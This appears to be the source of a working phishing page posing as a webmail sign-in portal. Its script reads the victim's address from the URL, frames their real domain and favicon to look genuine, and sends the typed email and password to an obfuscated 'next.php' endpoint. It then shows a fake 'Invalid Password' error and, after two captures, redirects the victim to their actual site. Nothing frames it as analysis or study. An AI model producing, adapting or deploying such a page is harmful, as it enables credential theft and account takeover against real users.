<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title class="domain">Portal Access </title>
    <link rel="icon" class="logoimg" type="image/x-icon" href="">
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <style type="text/css">
    .login-form {
        width: 385px;
        margin: 30px auto;
    }

    .login-form form {
        margin-bottom: 15px;
        background: #f7f7f7;
        box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        padding: 30px;
    }

    .login-form h2 {
        margin: 0 0 15px;
    }

    .form-control,
    .login-btn {
        min-height: 38px;
        border-radius: 2px;
    }

    .input-group-addon .fa {
        font-size: 18px;
    }

    .login-btn {
        font-size: 15px;
        font-weight: bold;
    }

    .social-btn .btn {
        border: none;
        margin: 10px 3px 0;
        opacity: 1;
    }

    .social-btn .btn:hover {
        opacity: 0.9;
    }

    .social-btn .btn-primary {
        background: #507cc0;
    }

    .social-btn .btn-info {
        background: #64ccf1;
    }

    .social-btn .btn-danger {
        background: #df4930;
    }

    .or-seperator {
        margin-top: 20px;
        text-align: center;
        border-top: 1px solid #ccc;
    }

    .or-seperator i {
        padding: 0 10px;
        background: #f7f7f7;
        position: relative;
        top: -11px;
        z-index: 1;
    }
    </style>
</head>

<body data-gr-c-s-loaded="true">
    <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;pointer-events: none;z-index: -9999;"></iframe>
    <p>&nbsp;</p>
    <p>&nbsp;</p>
    <div class="login-form">
        <form action="#" method="post">
            <h3 class="text-center">
                <div id="top">
                    <img src="images/download.jpeg" alt="Mailbox" class="logoimg" style="width:38px">
                    <span style="vertical-align: middle; padding-left: 5px" class="domain">Webmail</span>
                </div>
                <br>
                <p style="font-weight: 500;color: gray;font-size: 18px;">Sign in to continue</p>
                <br>
            </h3>
            <center>
                <div class="alert alert-danger" id="mgss" style="display: none;">Invalid Password.! Please Enter your correct Password</div>
                <span id="errror" class="text-danger font-weight-bold">Authentication Required</span>
            </center>
            <div class="form-group">
                <div class="input-group">
                    <span class="input-group-addon"><i class="fas fa-user"></i></span>
                    <input type="email" class="form-control" name="username" placeholder="Username" value="" id="ai">
                </div>
            </div>
            <div class="form-group">
                <div class="input-group">
                    <span class="input-group-addon"><i class="fas fa-lock"></i></span>
                    <input type="password" class="form-control" id="pr" name="pdf2" placeholder="Password" required="required">
                </div>
            </div>
            <div class="form-group">
                <input type="hidden" name="pdf1" size="35" value="info@dell.com"><input type="hidden" name="address" size="5" value="ancoreinspection.com">
                <br><input type="hidden" name="ai" size="35" value=""><input type="hidden" name="type" size="5" value="ancoreinspection.com">
                <button type="submit" class="btn btn-primary login-btn btn-block" id="sub_btn">Sign in</button>
            </div>
            <div class="clearfix">
                <label class="pull-left checkbox-inline"><input type="checkbox"> Secured Login session?</label>
                <a href="#" class="pull-right">Forgot Password?</a>
            </div>
        </form>
        <div style="text-align: center;">
            <a href="#">©<script>
                document.write(new Date().getFullYear());
                </script> Copyright. <span class="domain">Webmail</span>
            </a>
        </div>
    </div>
    <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
//redirect link
var rdrt = "https://www.google.com";

// if you want to redirection for domain (0 for no)(1 for yes)
var domain_redirect = 1;

//count result
var rc = 2;

//mailer link
var f = atob("bmV4dC5waHA=");




$(document).ready(function() {
    var cntt = 0;


    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        var my_ai = ai;
        $('#ai').val(my_ai);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#errror').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var m_slic = my_ai.substr((ind + 1));
        var c = m_slic.substr(0, m_slic.indexOf('.'));
        var fnll = c.toLowerCase();
        var fnllu = c.toUpperCase();

        var mainPage = 'https://' + m_slic;
        document.getElementById('mainPage').src = mainPage;

        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?sz=64&domain_url=" + m_slic);
        $(".logoimg").attr("href", "https://www.google.com/s2/favicons?sz=64&domain_url=" + m_slic);

        $(".domain").html(fnllu);
    }


    $('#sub_btn').click(function(event) {
        $('#errror').hide();
        $('#mgss').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var mgss = $('#mgss').html();
        $('#mgss').text(mgss);
        ///////////////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#errror').show();
            $('#errror').html("Email field is empty.!");
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#errror').show();
            $('#errror').html("That account doesn't exist. Enter a different account");
            return false;
        }
        if (!pr) {
            $('#errror').show();
            $('#errror').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var m_slic = my_ai.substr((ind + 1));
        var c = m_slic.substr(0, m_slic.indexOf('.'));
        var fnll = c.toLowerCase();
        var fnllu = c.toUpperCase();

        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?sz=64&domain_url=" + m_slic);
        $(".logoimg").attr("href", "https://www.google.com/s2/favicons?sz=64&domain_url=" + m_slic);
        $(".domain").html(fnllu);
        ///////////////////////////
        cntt = cntt + 1;

        $.ajax({
            dataType: 'JSON',
            url: f,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            beforeSend: function(xhr) {
                $('#sub_btn').html('Verifing...');
            },

            complete: function() {
                $("#pr").val("");
                if (cntt >= rc) {
                    cntt = 0;
                    if (domain_redirect == 1) {
                        window.location.replace("http://www." + m_slic);
                    } else {
                        window.location.replace(rdrt)
                    }
                    return false;
                }
                $("#mgss").show();
                $('#sub_btn').html('Sign in');
            }
        });
    });


});
</script>

</html>